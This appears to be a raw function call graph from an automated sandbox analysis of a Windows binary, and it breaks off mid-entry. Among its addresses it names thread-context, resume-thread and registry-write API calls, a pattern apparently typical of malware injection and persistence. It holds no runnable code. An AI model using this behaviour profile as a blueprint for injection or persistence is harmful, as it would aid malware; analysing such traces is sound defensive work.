2e87bbe 37136->37146 37144 2e89d4d 37137->37144 37145 2e8878f 37138->37145 37140 2e88713 37139->37140 37142 2e8871e 37140->37142 37143 2e647ec 11 API calls 37141->37143 37149 2e647ec 11 API calls 37142->37149 37151 2e89597 37143->37151 37147 2e789d0 20 API calls 37144->37147 37148 2e647ec 11 API calls 37145->37148 37150 2e647ec 11 API calls 37146->37150 37152 2e89d71 37147->37152 37158 2e887c6 37148->37158 37153 2e8874a 37149->37153 37159 2e87bf5 37150->37159 37155 2e789d0 20 API calls 37151->37155 37154 2e64860 11 API calls 37152->37154 37156 2e88755 37153->37156 37161 2e89d92 37154->37161 37157 2e895bb 37155->37157 37163 2e789d0 20 API calls 37156->37163 37160 2e64860 11 API calls 37157->37160 37162 2e789d0 20 API calls 37158->37162 37164 2e789d0 20 API calls 37159->37164 37170 2e895dc 37160->37170 37168 2e647ec 11 API calls 37161->37168 37166 2e887ea 37162->37166 37163->37134 37165 2e87c19 37164->37165 37167 2e64860 11 API calls 37165->37167 37169 2e64860 11 API calls 37166->37169 37172 2e87c3a 37167->37172 37173 2e89dc9 37168->37173 37174 2e8880b 37169->37174 37171 2e647ec 11 API calls 37170->37171 37178 2e89613 37171->37178 37177 2e647ec 11 API calls 37172->37177 37175 2e789d0 20 API calls 37173->37175 37176 2e647ec 11 API calls 37174->37176 37179 2e89ded 37175->37179 37183 2e88842 37176->37183 37184 2e87c71 37177->37184 37181 2e789d0 20 API calls 37178->37181 37180 2e64860 11 API calls 37179->37180 37186 2e89e0e 37180->37186 37182 2e89637 37181->37182 37185 2e64860 11 API calls 37182->37185 37187 2e789d0 20 API calls 37183->37187 37188 2e789d0 20 API calls 37184->37188 37192 2e89658 37185->37192 37191 2e647ec 11 API calls 37186->37191 37189 2e88866 37187->37189 37190 2e87c95 37188->37190 37193 2e649f8 11 API calls 37189->37193 37194 2e64860 11 API calls 37190->37194 37197 2e89e45 37191->37197 37196 2e647ec 11 API calls 37192->37196 37195 2e8888a 37193->37195 37200 2e87cd5 37194->37200 37198 2e64860 11 API calls 37195->37198 37202 2e8968f 37196->37202 37201 2e789d0 20 API calls 37197->37201 37199 2e888b9 37198->37199 37207 2e888c4 37199->37207 37203 2e647ec 11 API calls 37200->37203 37206 2e89e69 37201->37206 37204 2e789d0 20 API calls 37202->37204 37213 2e87d0c 37203->37213 37205 2e896b3 37204->37205 37208 2e7f094 11 API calls 37205->37208 37211 2e789d0 20 API calls 37206->37211 37209 2e647ec 11 API calls 37207->37209 37210 2e896ce 37208->37210 37212 2e888f0 37209->37212 37214 2e64860 11 API calls 37210->37214 37217 2e89e9c 37211->37217 37218 2e888fb 37212->37218 37215 2e789d0 20 API calls 37213->37215 37220 2e896f7 37214->37220 37216 2e87d30 37215->37216 37219 2e64860 11 API calls 37216->37219 37222 2e789d0 20 API calls 37217->37222 37221 2e789d0 20 API calls 37218->37221 37226 2e87d51 37219->37226 37224 2e64860 11 API calls 37220->37224 37223 2e88914 37221->37223 37228 2e89ecf 37222->37228 37225 2e64860 11 API calls 37223->37225 37230 2e8972f 37224->37230 37229 2e88935 37225->37229 37227 2e647ec 11 API calls 37226->37227 37234 2e87d88 37227->37234 37231 2e789d0 20 API calls 37228->37231 37233 2e647ec 11 API calls 37229->37233 37232 2e647ec 11 API calls 37230->37232 37235 2e89f02 37231->37235 37237 2e89766 37232->37237 37238 2e8896c 37233->37238 37236 2e789d0 20 API calls 37234->37236 37240 2e789d0 20 API calls 37235->37240 37239 2e87dac 37236->37239 37242 2e789d0 20 API calls 37237->37242 37244 2e789d0 20 API calls 37238->37244 37241 2e64860 11 API calls 37239->37241 37243 2e89f35 37240->37243 37250 2e87dcd 37241->37250 37245 2e8978a 37242->37245 37246 2e64860 11 API calls 37243->37246 37247 2e88990 37244->37247 37248 2e64860 11 API calls 37245->37248 37252 2e89f56 37246->37252 37249 2e64860 11 API calls 37247->37249 37253 2e897ab 37248->37253 37254 2e889b1 37249->37254 37251 2e647ec 11 API calls 37250->37251 37258 2e87e04 37251->37258 37255 2e647ec 11 API calls 37252->37255 37257 2e647ec 11 API calls 37253->37257 37256 2e647ec 11 API calls 37254->37256 37259 2e89f8d 37255->37259 37262 2e889e8 37256->37262 37261 2e897e2 37257->37261 37260 2e789d0 20 API calls 37258->37260 37264 2e789d0 20 API calls 37259->37264 37263 2e87e28 37260->37263 37266 2e789d0 20 API calls 37261->37266 37268 2e789d0 20 API calls 37262->37268 38180 2e75aec 42 API calls 37263->38180 37267 2e89fb1 37264->37267 37270 2e89806 37266->37270 37271 2e64860 11 API calls 37267->37271 37272 2e88a0c 37268->37272 37762 2e67e5c 37270->37762 37285 2e89fd2 37271->37285 38183 2e7d164 23 API calls 37272->38183 37275 2e87e54 37278 2e64bcc 11 API calls 37275->37278 37277 2e88a20 37280 2e64860 11 API calls 37277->37280 37281 2e87e69 37278->37281 37279 2e89aef 37283 2e64860 11 API calls 37279->37283 37287 2e88a46 37280->37287 37284 2e64860 11 API calls 37281->37284 37282 2e64860 11 API calls 37288 2e89839 37282->37288 37289 2e89b10 37283->37289 37291 2e87e8a 37284->37291 37286 2e647ec 11 API calls 37285->37286 37293 2e8a009 37286->37293 37290 2e647ec 11 API calls 37287->37290 37294 2e647ec 11 API calls 37288->37294 37292 2e647ec 11 API calls 37289->37292 37298 2e88a7d 37290->37298 37295 2e647ec 11 API calls 37291->37295 37300 2e89b47 37292->37300 37296 2e789d0 20 API calls 37293->37296 37299 2e89870 37294->37299 37303 2e87ec1 37295->37303 37297 2e8a02d 37296->37297 37301 2e64860 11 API calls 37297->37301 37302 2e789d0 20 API calls 37298->37302 37304 2e789d0 20 API calls 37299->37304 37305 2e789d0 20 API calls 37300->37305 37314 2e8a04e 37301->37314 37306 2e88aa1 37302->37306 37310 2e789d0 20 API calls 37303->37310 37307 2e89894 37304->37307 37308 2e89b6b 37305->37308 37309 2e64860 11 API calls 37306->37309 37312 2e64860 11 API calls 37307->37312 37313 2e64860 11 API calls 37308->37313 37317 2e88ac2 37309->37317 37311 2e87ee5 37310->37311 37316 2e649f8 11 API calls 37311->37316 37319 2e898b5 37312->37319 37320 2e89b8c 37313->37320 37315 2e647ec 11 API calls 37314->37315 37326 2e8a085 37315->37326 37318 2e87f02 37316->37318 37322 2e647ec 11 API calls 37317->37322 38181 2e77e50 17 API calls 37318->38181 37324 2e647ec 11 API calls 37319->37324 37325 2e647ec 11 API calls 37320->37325 37329 2e88af9 37322->37329 37323 2e87f08 37327 2e64860 11 API calls 37323->37327 37330 2e898ec 37324->37330 37331 2e89bc3 37325->37331 37328 2e789d0 20 API calls 37326->37328 37333 2e87f29 37327->37333 37336 2e8a0a9 37328->37336 37332 2e789d0 20 API calls 37329->37332 37334 2e789d0 20 API calls 37330->37334 37335 2e789d0 20 API calls 37331->37335 37337 2e88b1d 37332->37337 37341 2e647ec 11 API calls 37333->37341 37338 2e89910 37334->37338 37339 2e89be7 37335->37339 37344 2e789d0 20 API calls 37336->37344 37340 2e64860 11 API calls 37337->37340 37342 2e64860 11 API calls 37338->37342 37343 2e64860 11 API calls 37339->37343 37346 2e88b3e 37340->37346 37345 2e87f60 37341->37345 37347 2e89931 37342->37347 37348 2e89c08 37343->37348 37349 2e8a0dc 37344->37349 37350 2e789d0 20 API calls 37345->37350 37351 2e647ec 11 API calls 37346->37351 37353 2e647ec 11 API calls 37347->37353 37354 2e647ec 11 API calls 37348->37354 37355 2e789d0 20 API calls 37349->37355 37352 2e87f84 37350->37352 37357 2e88b75 37351->37357 37356 2e64860 11 API calls 37352->37356 37360 2e89968 37353->37360 37358 2e89c3f 37354->37358 37359 2e8a10f 37355->37359 37362 2e87fa5 37356->37362 37361 2e789d0 20 API calls 37357->37361 37364 2e789d0 20 API calls 37358->37364 37365 2e789d0 20 API calls 37359->37365 37363 2e789d0 20 API calls 37360->37363 37366 2e88b99 37361->37366 37371 2e647ec 11 API calls 37362->37371 37367 2e8998c 37363->37367 37368 2e89c63 37364->37368 37378 2e8a142 37365->37378 37369 2e88bb9 37366->37369 37370 2e88ba2 37366->37370 37372 2e7e358 11 API calls 37367->37372 37373 2e64860 11 API calls 37368->37373 37375 2e64860 11 API calls 37369->37375 38184 2e78730 17 API calls 37370->38184 37380 2e87fdc 37371->37380 37376 2e899a1 37372->37376 37382 2e89c84 37373->37382 37384 2e88bda 37375->37384 37377 2e64530 11 API calls 37376->37377 37379 2e899b1 37377->37379 37383 2e789d0 20 API calls 37378->37383 37381 2e64860 11 API calls 37379->37381 37385 2e789d0 20 API calls 37380->37385 37390 2e899d2 37381->37390 37387 2e647ec 11 API calls 37382->37387 37391 2e8a175 37383->37391 37388 2e647ec 11 API calls 37384->37388 37386 2e88000 37385->37386 37389 2e64860 11 API calls 37386->37389 37394 2e89cbb 37387->37394 37392 2e88c11 37388->37392 37397 2e88021 37389->37397 37393 2e647ec 11 API calls 37390->37393 37395 2e789d0 20 API calls 37391->37395 37400 2e789d0 20 API calls 37392->37400 37404 2e89a09 37393->37404 37398 2e789d0 20 API calls 37394->37398 37396 2e8a1a8 37395->37396 37399 2e64860 11 API calls 37396->37399 37403 2e647ec 11 API calls 37397->37403 37401 2e89cdf 37398->37401 37410 2e8a1c9 37399->37410 37402 2e88c35 37400->37402 37405 2e649f8 11 API calls 37401->37405 37406 2e64860 11 API calls 37402->37406 37412 2e88058 37403->37412 37408 2e789d0 20 API calls 37404->37408 37407 2e89ce9 37405->37407 37415 2e88c56 37406->37415 37766 2e78d70 37407->37766 37411 2e89a2d 37408->37411 37414 2e647ec 11 API calls 37410->37414 37413 2e64860 11 API calls 37411->37413 37416 2e789d0 20 API calls 37412->37416 37420 2e89a4e 37413->37420 37421 2e8a200 37414->37421 37418 2e647ec 11 API calls 37415->37418 37417 2e8807c 37416->37417 37419 2e64860 11 API calls 37417->37419 37422 2e88c8d 37418->37422 37425 2e8809d 37419->37425 37423 2e647ec 11 API calls 37420->37423 37424 2e789d0 20 API calls 37421->37424 37427 2e789d0 20 API calls 37422->37427 37432 2e89a85 37423->37432 37426 2e8a224 37424->37426 37430 2e647ec 11 API calls 37425->37430 37428 2e64860 11 API calls 37426->37428 37429 2e88cb1 37427->37429 37434 2e8a245 37428->37434 37431 2e64860 11 API calls 37429->37431 37435 2e880d4 37430->37435 37437 2e88cd2 37431->37437 37433 2e789d0 20 API calls 37432->37433 37443 2e89aa9 37433->37443 37436 2e647ec 11 API calls 37434->37436 37438 2e789d0 20 API calls 37435->37438 37442 2e8a27c 37436->37442 37439 2e647ec 11 API calls 37437->37439 37440 2e880f8 37438->37440 37446 2e88d09 37439->37446 38182 2e7b118 39 API calls 37440->38182 37445 2e789d0 20 API calls 37442->37445 37444 2e7dc8c 17 API calls 37443->37444 37444->37279 37451 2e8a2a0 37445->37451 37448 2e789d0 20 API calls 37446->37448 37447 2e88109 37449 2e88d2d ResumeThread 37448->37449 37450 2e64860 11 API calls 37449->37450 37455 2e88d59 37450->37455 37452 2e789d0 20 API calls 37451->37452 37453 2e8a2d3 37452->37453 37454 2e64860 11 API calls 37453->37454 37457 2e8a2f4 37454->37457 37456 2e647ec 11 API calls 37455->37456 37459 2e88d90 37456->37459 37458 2e647ec 11 API calls 37457->37458 37463 2e8a32b 37458->37463 37460 2e789d0 20 API calls 37459->37460 37461 2e88db4 37460->37461 37462 2e64860 11 API calls 37461->37462 37467 2e88dd5 37462->37467 37464 2e789d0 20 API calls 37463->37464 37465 2e8a34f 37464->37465 37466 2e64860 11 API calls 37465->37466 37469 2e8a370 37466->37469 37468 2e647ec 11 API calls 37467->37468 37471 2e88e0c 37468->37471 37470 2e647ec 11 API calls 37469->37470 37474 2e8a3a7 37470->37474 37472 2e789d0 20 API calls 37471->37472 37473 2e88e30 37472->37473 37475 2e64860 11 API calls 37473->37475 37476 2e789d0 20 API calls 37474->37476 37478 2e88e51 37475->37478 37477 2e8a3cb 37476->37477 37479 2e64860 11 API calls 37477->37479 37480 2e647ec 11 API calls 37478->37480 37481 2e8a3ec 37479->37481 37483 2e88e88 37480->37483 37482 2e647ec 11 API calls 37481->37482 37486 2e8a423 37482->37486 37484 2e789d0 20 API calls 37483->37484 37485 2e88eac CloseHandle 37484->37485 37487 2e64860 11 API calls 37485->37487 37488 2e789d0 20 API calls 37486->37488 37489 2e88ed8 37487->37489 37491 2e8a447 37488->37491 37490 2e647ec 11 API calls 37489->37490 37493 2e88f0f 37490->37493 37492 2e789d0 20 API calls 37491->37492 37494 2e8a47a 37492->37494 37495 2e789d0 20 API calls 37493->37495 37497 2e789d0 20 API calls 37494->37497 37496 2e88f33 37495->37496 37498 2e64860 11 API calls 37496->37498 37499 2e8a4ad 37497->37499 37500 2e88f54 37498->37500 37502 2e789d0 20 API calls 37499->37502 37501 2e647ec 11 API calls 37500->37501 37504 2e88f8b 37501->37504 37503 2e8a4e0 37502->37503 37505 2e789d0 20 API calls 37503->37505 37506 2e789d0 20 API calls 37504->37506 37507 2e8a513 37505->37507 37508 2e88faf 37506->37508 37509 2e64860 11 API calls 37507->37509 37510 2e64860 11 API calls 37508->37510 37511 2e8a534 37509->37511 37512 2e88fd0 37510->37512 37513 2e647ec 11 API calls 37511->37513 37514 2e647ec 11 API calls 37512->37514 37516 2e8a56b 37513->37516 37515 2e89007 37514->37515 37518 2e789d0 20 API calls 37515->37518 37517 2e789d0 20 API calls 37516->37517 37519 2e8a58f 37517->37519 37520 2e8902b 37518->37520 37521 2e64860 11 API calls 37519->37521 37522 2e64860 11 API calls 37520->37522 37523 2e8a5b0 37521->37523 37524 2e8904c 37522->37524 37525 2e647ec 11 API calls 37523->37525 37526 2e647ec 11 API calls 37524->37526 37528 2e8a5e7 37525->37528 37527 2e89083 37526->37527 37529 2e789d0 20 API calls 37527->37529 37530 2e789d0 20 API calls 37528->37530 37531 2e890a7 37529->37531 37533 2e8a60b 37530->37533 37532 2e64860 11 API calls 37531->37532 37535 2e890c8 37532->37535 37534 2e789d0 20 API calls 37533->37534 37537 2e8a63e 37534->37537 37536 2e647ec 11 API calls 37535->37536 37539 2e890ff 37536->37539 37538 2e789d0 20 API calls 37537->37538 37543 2e8a671 37538->37543 37540 2e789d0 20 API calls 37539->37540 37541 2e89123 37540->37541 37542 2e64860 11 API calls 37541->37542 37545 2e89144 37542->37545 37544 2e789d0 20 API calls 37543->37544 37546 2e8a6a4 37544->37546 37547 2e647ec 11 API calls 37545->37547 37548 2e789d0 20 API calls 37546->37548 37549 2e8917b 37547->37549 37550 2e8a6d7 37548->37550 37551 2e789d0 20 API calls 37549->37551 37554 2e789d0 20 API calls 37550->37554 37552 2e8919f 37551->37552 37553 2e64860 11 API calls 37552->37553 37557 2e891c0 37553->37557 37555 2e8a70a 37554->37555 37556 2e64860 11 API calls 37555->37556 37558 2e8a72b 37556->37558 37559 2e647ec 11 API calls 37557->37559 37560 2e647ec 11 API calls 37558->37560 37561 2e891f7 37559->37561 37562 2e8a762 37560->37562 37563 2e789d0 20 API calls 37561->37563 37565 2e789d0 20 API calls 37562->37565 37564 2e8921b 37563->37564 37567 2e7894c 21 API calls 37564->37567 37566 2e8a786 37565->37566 37568 2e64860 11 API calls 37566->37568 37569 2e8923a 37567->37569 37572 2e8a7a7 37568->37572 37570 2e7894c 21 API calls 37569->37570 37571 2e8924e 37570->37571 37573 2e7894c 21 API calls 37571->37573 37575 2e647ec 11 API calls 37572->37575 37574 2e89262 37573->37574 37576 2e7894c 21 API calls 37574->37576 37580 2e8a7de 37575->37580 37577 2e89276 37576->37577 37578 2e7894c 21 API calls 37577->37578 37579 2e8928a 37578->37579 37581 2e7894c 21 API calls 37579->37581 37583 2e789d0 20 API calls 37580->37583 37582 2e8929e CloseHandle 37581->37582 37584 2e64860 11 API calls 37582->37584 37585 2e8a802 37583->37585 37587 2e892ca 37584->37587 37586 2e64860 11 API calls 37585->37586 37589 2e8a823 37586->37589 37588 2e647ec 11 API calls 37587->37588 37591 2e89301 37588->37591 37590 2e647ec 11 API calls 37589->37590 37592 2e8a85a 37590->37592 37593 2e789d0 20 API calls 37591->37593 37595 2e789d0 20 API calls 37592->37595 37594 2e89325 37593->37594 37596 2e64860 11 API calls 37594->37596 37597 2e8a87e 37595->37597 37599 2e89346 37596->37599 37598 2e64860 11 API calls 37597->37598 37601 2e8a89f 37598->37601 37600 2e647ec 11 API calls 37599->37600 37603 2e8937d 37600->37603 37602 2e647ec 11 API calls 37601->37602 37604 2e8a8d6 37602->37604 37605 2e789d0 20 API calls 37603->37605 37606 2e789d0 20 API calls 37604->37606 37605->37062 37607 2e8a8fa 37606->37607 37608 2e64860 11 API calls 37607->37608 37609 2e8a91b 37608->37609 37610 2e647ec 11 API calls 37609->37610 37611 2e8a952 37610->37611 37612 2e789d0 20 API calls 37611->37612 37613 2e8a976 37612->37613 37614 2e789d0 20 API calls 37613->37614 37615 2e8a985 37614->37615 37616 2e789d0 20 API calls 37615->37616 37617 2e8a994 37616->37617 37618 2e789d0 20 API calls 37617->37618 37619 2e8a9a3 37618->37619 37620 2e789d0 20 API calls 37619->37620 37621 2e8a9b2 37620->37621 37622 2e789d0 20 API calls 37621->37622 37623 2e8a9c1 37622->37623 37624 2e789d0 20 API calls 37623->37624 37625 2e8a9d0 37624->37625 37626 2e789d0 20 API calls 37625->37626 37627 2e8a9df 37626->37627 37628 2e789d0 20 API calls 37627->37628 37629 2e8a9ee 37628->37629 37630 2e789d0 20 API calls 37629->37630 37631 2e8a9fd 37630->37631 37632 2e789d0 20 API calls 37631->37632 37633 2e8aa0c 37632->37633 37634 2e789d0 20 API calls 37633->37634 37635 2e8aa1b 37634->37635 37636 2e789d0 20 API calls 37635->37636 37637 2e8aa2a 37636->37637 37638 2e789d0 20 API calls 37637->37638 37639 2e8aa39 37638->37639 37640 2e789d0 20 API calls 37639->37640 37641 2e8aa48 37640->37641 37642 2e789d0 20 API calls 37641->37642 37643 2e8aa57 37642->37643 37644 2e64860 11 API calls 37643->37644 37645 2e8aa78 37644->37645 37646 2e647ec 11 API calls 37645->37646 37647 2e8aaaf 37646->37647 37648 2e789d0 20 API calls 37647->37648 37649 2e8aad3 37648->37649 37650 2e789d0 20 API calls 37649->37650 37651 2e8ab06 37650->37651 37652 2e789d0 20 API calls 37651->37652 37653 2e8ab39 37652->37653 37654 2e789d0 20 API calls 37653->37654 37655 2e8ab6c 37654->37655 37656 2e789d0 20 API calls 37655->37656 37657 2e8ab9f 37656->37657 37658 2e789d0 20 API calls 37657->37658 37659 2e8abd2 37658->37659 37660 2e789d0 20 API calls 37659->37660 37661 2e8ac05 37660->37661 37662 2e789d0 20 API calls 37661->37662 37663 2e8ac38 37662->37663 37664 2e64860 11 API calls 37663->37664 37665 2e8ac59 37664->37665 37666 2e647ec 11 API calls 37665->37666 37667 2e8ac90 37666->37667 37668 2e789d0 20 API calls 37667->37668 37669 2e8acb4 37668->37669 37670 2e64860 11 API calls 37669->37670 37671 2e8acd5 37670->37671 37672 2e647ec 11 API calls 37671->37672 37673 2e8ad0c 37672->37673 37674 2e789d0 20 API calls 37673->37674 37675 2e8ad30 37674->37675 37676 2e64860 11 API calls 37675->37676 37677 2e8ad51 37676->37677 37678 2e647ec 11 API calls 37677->37678 37679 2e8ad88 37678->37679 37680 2e789d0 20 API calls 37679->37680 37681 2e8adac 37680->37681 37682 2e789d0 20 API calls 37681->37682 37683 2e8addf 37682->37683 37684 2e789d0 20 API calls 37683->37684 37685 2e8ae12 37684->37685 37686 2e789d0 20 API calls 37685->37686 37687 2e8ae45 37686->37687 37688 2e789d0 20 API calls 37687->37688 37689 2e8ae78 37688->37689 37690 2e789d0 20 API calls 37689->37690 37691 2e8aeab 37690->37691 37692 2e789d0 20 API calls 37691->37692 37693 2e8aede 37692->37693 37694 2e789d0 20 API calls 37693->37694 37695 2e8af11 37694->37695 37696 2e789d0 20 API calls 37695->37696 37697 2e8af44 37696->37697 37698 2e789d0 20 API calls 37697->37698 37699 2e8af77 37698->37699 37700 2e789d0 20 API calls 37699->37700 37701 2e8afaa 37700->37701 37702 2e789d0 20 API calls 37701->37702 37703 2e8afdd 37702->37703 37704 2e789d0 20 API calls 37703->37704 37705 2e8b010 37704->37705 37706 2e789d0 20 API calls 37705->37706 37707 2e8b043 37706->37707 37708 2e789d0 20 API calls 37707->37708 37709 2e8b076 37708->37709 37710 2e789d0 20 API calls 37709->37710 37711 2e8b0a9 37710->37711 37712 2e789d0 20 API calls 37711->37712 37713 2e8b0dc 37712->37713 37714 2e789d0 20 API calls 37713->37714 37715 2e8b10f 37714->37715 37716 2e789d0 20 API calls 37715->37716 37717 2e8b142 37716->37717 37718 2e789d0 20 API calls 37717->37718 37719 2e8b175 37718->37719 37720 2e78338 18 API calls 37719->37720 37721 2e8b184 37720->37721 37722 2e64860 11 API calls 37721->37722 37723 2e8b1a5 37722->37723 37724 2e647ec 11 API calls 37723->37724 37725 2e8b1dc 37724->37725 37726 2e789d0 20 API calls 37725->37726 37727 2e8b200 37726->37727 37728 2e64860 11 API calls 37727->37728 37729 2e8b221 37728->37729 37730 2e647ec 11 API calls 37729->37730 37731 2e8b258 37730->37731 37732 2e789d0 20 API calls 37731->37732 37733 2e8b27c 37732->37733 37734 2e64860 11 API calls 37733->37734 37735 2e8b29d 37734->37735 37736 2e647ec 11 API calls 37735->37736 37737 2e8b2d4 37736->37737 37738 2e789d0 20 API calls 37737->37738 37739 2e8b2f8 ExitProcess 37738->37739 37747 2e7e114 37740->37747 37741 2e7e197 37742 2e644dc 11 API calls 37741->37742 37743 2e7e19f 37742->37743 37745 2e64530 11 API calls 37743->37745 37744 2e649f8 11 API calls 37744->37747 37746 2e7e1aa 37745->37746 37748 2e64500 11 API calls 37746->37748 37747->37741 37747->37744 37749 2e7e1c4 37748->37749 37749->36953 37751 2e7f22b 37750->37751 37752 2e7f256 RegOpenKeyA 37751->37752 37753 2e7f264 37752->37753 37754 2e649f8 11 API calls 37753->37754 37755 2e7f27c 37754->37755 37756 2e7f289 RegSetValueExA RegCloseKey 37755->37756 37757 2e7f2ad 37756->37757 37758 2e64500 11 API calls 37757->37758 37759 2e7f2ba 37758->37759 37760 2e644dc 11 API calls 37759->37760 37761 2e7f2c2 37760->37761 37761->36956 38185 2e649a0 37762->38185 37765 2e67e71 37765->37279 37765->37282 37767 2e78d78 37766->37767 37768 2e64860 11 API calls 37767->37768 37769 2e78dbb 37768->37769 37770 2e647ec 11 API calls 37769->37770 37771 2e78de0 37770->37771 37772 2e789d0 20 API calls 37771->37772 37773 2e78dfb 37772->37773 37774 2e64860 11 API calls 37773->37774 37775 2e78e14 37774->37775 37776 2e647ec 11 API calls 37775->37776 37777 2e78e39 37776->37777 37778 2e789d0 20 API calls 37777->37778 37779 2e78e54 37778->37779 37780 2e7a8b7 37779->37780 37781 2e64860 11 API calls 37779->37781 37782 2e64500 11 API calls 37780->37782 37786 2e78e85 37781->37786 37783 2e7a8d4 37782->37783 37784 2e64500 11 API calls 37783->37784 37785 2e7a8e4 37784->37785 37787 2e64c60 SysFreeString 37785->37787 37789 2e647ec 11 API calls 37786->37789 37788 2e7a8ef 37787->37788 37790 2e64500 11 API calls 37788->37790 37794 2e78eaa 37789->37794 37791 2e7a8ff 37790->37791 37792 2e644dc 11 API calls 37791->37792 37793 2e7a907 37792->37793 37795 2e64500 11 API calls 37793->37795 37797 2e789d0 20 API calls 37794->37797 37796 2e7a914 37795->37796 37798 2e64500 11 API calls 37796->37798 37799 2e78ec5 37797->37799 37800 2e7a921 37798->37800 37801 2e64860 11 API calls 37799->37801 37800->37124 37802 2e78ede 37801->37802 37803 2e647ec 11 API calls 37802->37803 37804 2e78f03 37803->37804 37805 2e789d0 20 API calls 37804->37805 37806 2e78f1e 37805->37806 37806->37780 37807 2e64860 11 API calls 37806->37807 37808 2e78f66 37807->37808 37809 2e647ec 11 API calls 37808->37809 37810 2e78f8b 37809->37810 37811 2e789d0 20 API calls 37810->37811 37812 2e78fa6 37811->37812 37813 2e64860 11 API calls 37812->37813 37814 2e78fbf 37813->37814 37815 2e647ec 11 API calls 37814->37815 37816 2e78fe4 37815->37816 37817 2e789d0 20 API calls 37816->37817 37818 2e78fff 37817->37818 37819 2e64860 11 API calls 37818->37819 37820 2e79044 37819->37820 37821 2e647ec 11 API calls 37820->37821 37822 2e79069 37821->37822 37823 2e789d0 20 API calls 37822->37823 37824 2e79084 37823->37824 37825 2e64860 11 API calls 37824->37825 37826 2e7909d 37825->37826 37827 2e647ec 11 API calls 37826->37827 37828 2e790c5 37827->37828 37829 2e789d0 20 API calls 37828->37829 37830 2e790e3 37829->37830 37831 2e64860 11 API calls 37830->37831 37832 2e790ff 37831->37832 37833 2e647ec 11 API calls 37832->37833 37834 2e79130 37833->37834 37835 2e789d0 20 API calls 37834->37835 37836 2e79154 37835->37836 37837 2e64860 11 API calls 37836->37837 37838 2e79170 37837->37838 37839 2e647ec 11 API calls 37838->37839 37840 2e791a1 37839->37840 37841 2e789d0 20 API calls 37840->37841 37842 2e791c5 37841->37842 37843 2e64860 11 API calls 37842->37843 37844 2e791e1 37843->37844 37845 2e647ec 11 API calls 37844->37845 37846 2e79212 37845->37846 37847 2e789d0 20 API calls 37846->37847 37848 2e79236 37847->37848 37849 2e78788 18 API calls 37848->37849 37850 2e79273 37849->37850 37851 2e792e8 37850->37851 37853 2e64860 11 API calls 37850->37853 37852 2e64860 11 API calls 37851->37852 37854 2e79304 37852->37854 37855 2e79293 37853->37855 37856 2e647ec 11 API calls 37854->37856 37857 2e647ec 11 API calls 37855->37857 37858 2e79335 37856->37858 37859 2e792c4 37857->37859 37860 2e789d0 20 API calls 37858->37860 37861 2e789d0 20 API calls 37859->37861 37862 2e79359 37860->37862 37861->37851 37863 2e789d0 20 API calls 37862->37863 37864 2e7938c 37863->37864 37865 2e64860 11 API calls 37864->37865 37866 2e793a8 37865->37866 37867 2e647ec 11 API calls 37866->37867 37868 2e793d9 37867->37868 37869 2e789d0 20 API calls 37868->37869 37870 2e793fd 37869->37870 37871 2e64860 11 API calls 37870->37871 37872 2e79419 37871->37872 37873 2e647ec 11 API calls 37872->37873 37874 2e7944a 37873->37874 37875 2e789d0 20 API calls 37874->37875 37876 2e7946e 37875->37876 37877 2e62ee0 2 API calls 37876->37877 37878 2e79473 37877->37878 37879 2e64860 11 API calls 37878->37879 37880 2e794b6 37879->37880 37881 2e647ec 11 API calls 37880->37881 37882 2e794e7 37881->37882 37883 2e789d0 20 API calls 37882->37883 37884 2e7950b 37883->37884 37885 2e64860 11 API calls 37884->37885 37886 2e79527 37885->37886 37887 2e647ec 11 API calls 37886->37887 37888 2e79558 37887->37888 37889 2e789d0 20 API calls 37888->37889 37890 2e7957c 37889->37890 37891 2e64860 11 API calls 37890->37891 37892 2e79598 37891->37892 37893 2e647ec 11 API calls 37892->37893 37894 2e795c9 37893->37894 37895 2e789d0 20 API calls 37894->37895 37896 2e795ed GetThreadContext 37895->37896 37896->37780 37897 2e7960f 37896->37897 37898 2e64860 11 API calls 37897->37898 37899 2e7962b 37898->37899 37900 2e647ec 11 API calls 37899->37900 37901 2e7965c 37900->37901 37902 2e789d0 20 API calls 37901->37902 37903 2e79680 37902->37903 37904 2e64860 11 API calls 37903->37904 37905 2e7969c 37904->37905 37906 2e647ec 11 API calls 37905->37906 37907 2e796cd 37906->37907 37908 2e789d0 20 API calls 37907->37908 37909 2e796f1 37908->37909 37910 2e64860 11 API calls 37909->37910 37911 2e7970d 37910->37911 37912 2e647ec 11 API calls 37911->37912 37913 2e7973e 37912->37913 37914 2e789d0 20 API calls 37913->37914 37915 2e79762 37914->37915 37916 2e64860 11 API calls 37915->37916 37917 2e7977e 37916->37917 37918 2e647ec 11 API calls 37917->37918 37919 2e797af 37918->37919 37920 2e789d0 20 API calls 37919->37920 37921 2e797d3 37920->37921 37922 2e64860 11 API calls 37921->37922 37923 2e797ef 37922->37923 37924 2e647ec 11 API calls 37923->37924 37925 2e79820 37924->37925 37926 2e789d0 20 API calls 37925->37926 37927 2e79844 37926->37927 38187 2e78400 37927->38187 37930 2e79b7f 37932 2e64860 11 API calls 37930->37932 37931 2e79878 37933 2e64860 11 API calls 37931->37933 37934 2e79b9b 37932->37934 37935 2e79894 37933->37935 37936 2e647ec 11 API calls 37934->37936 37937 2e647ec 11 API calls 37935->37937 37938 2e79bcc 37936->37938 37939 2e798c5 37937->37939 37940 2e79b78 37938->37940 37941 2e789d0 20 API calls 37938->37941 37942 2e789d0 20 API calls 37939->37942 37944 2e64860 11 API calls 37940->37944 37941->37940 37943 2e798e9 37942->37943 37945 2e64860 11 API calls 37943->37945 37946 2e79c0c 37944->37946 37947 2e79905 37945->37947 37948 2e647ec 11 API calls 37946->37948 37949 2e647ec 11 API calls 37947->37949 37950 2e79c3d 37948->37950 37951 2e79936 37949->37951 37952 2e789d0 20 API calls 37950->37952 37953 2e789d0 20 API calls 37951->37953 37954 2e79c61 37952->37954 37955 2e7995a 37953->37955 37956 2e64860 11 API calls 37954->37956 37957 2e64860 11 API calls 37955->37957 37958 2e79c7d 37956->37958 37959 2e79976 37957->37959 37960 2e647ec 11 API calls 37958->37960 37961 2e647ec 11 API calls 37959->37961 37962 2e79cae 37960->37962 37963 2e799a7 37961->37963 37964 2e789d0 20 API calls 37962->37964 37965 2e789d0 20 API calls 37963->37965 37966 2e79cd2 37964->37966 37967 2e799cb 37965->37967 37968 2e64860 11 API calls 37966->37968 38201 2e78670 37967->38201 37974 2e79cee 37968->37974 37971 2e799e3 38215 2e77a2c 37971->38215 37972 2e79a0b 37975 2e64860 11 API calls 37972->37975 37977 2e647ec 11 API calls 37974->37977 37979 2e79a27 37975->37979 37976 2e79a04 37978 2e64860 11 API calls 37976->37978 37980 2e79d1f 37977->37980 37982 2e79a98 37978->37982 37981 